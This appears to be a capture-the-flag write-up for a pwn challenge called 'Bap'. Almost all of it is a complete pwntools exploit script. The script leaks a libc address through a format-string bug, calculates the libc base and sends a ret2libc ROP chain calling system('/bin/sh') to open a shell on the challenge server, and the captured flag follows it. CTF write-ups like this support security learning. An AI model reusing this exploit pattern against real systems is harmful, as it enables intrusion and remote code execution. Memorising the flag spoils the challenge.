Bap

Solves: TBD
Score: 130
Technique: Fmtstr Ret2libc

bap bap bap

Script

from pwn import *
elf = context.binary = ELF('./bap')
libc = ELF('./libc.so.6')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rop = ROP(libc)

r = remote('challs.actf.co', 31323)
# r = elf.process()
# r = gdb.debug('./bap', gdbscript='''b * 0x4011CC''')

# leak stack
# for i in range(0,30):
#     r = remote('challs.actf.co', 31323, level='error')
#     # r = elf.process(level='error')
#     r.sendline(b'AAAA %%%d$p' % i)
#     print("%d - %s" % (i, r.recvuntil(b'\n').strip()))

# leak __libc_start_main + 133
fmtstr = b'%29$p'
main = elf.symbols.main
ret = next(elf.search(asm('ret')))
leak = fmtstr + b'.' * (16 - len(fmtstr)) + b'A'*8 + p64(ret) + p64(main)
r.sendline(leak)
r.recvuntil(b': ')
libc_leak = int(r.recvuntil(b'.',drop=True),16)
log.info(f"libc_leak: {hex(libc_leak)}")
libc_leak = libc_leak - 133 + 5
libc.address = libc_leak - libc.symbols.__libc_start_main
log.info(f"libc address: {hex(libc.address)}")

# ret2libc to spawn shell
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + libc.address
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

rop_payload = b'A'*24 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(main)
r.sendline(rop_payload)

r.interactive()

Flag

actf{baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaap____}

Bap

Script​

Flag​

Script

Flag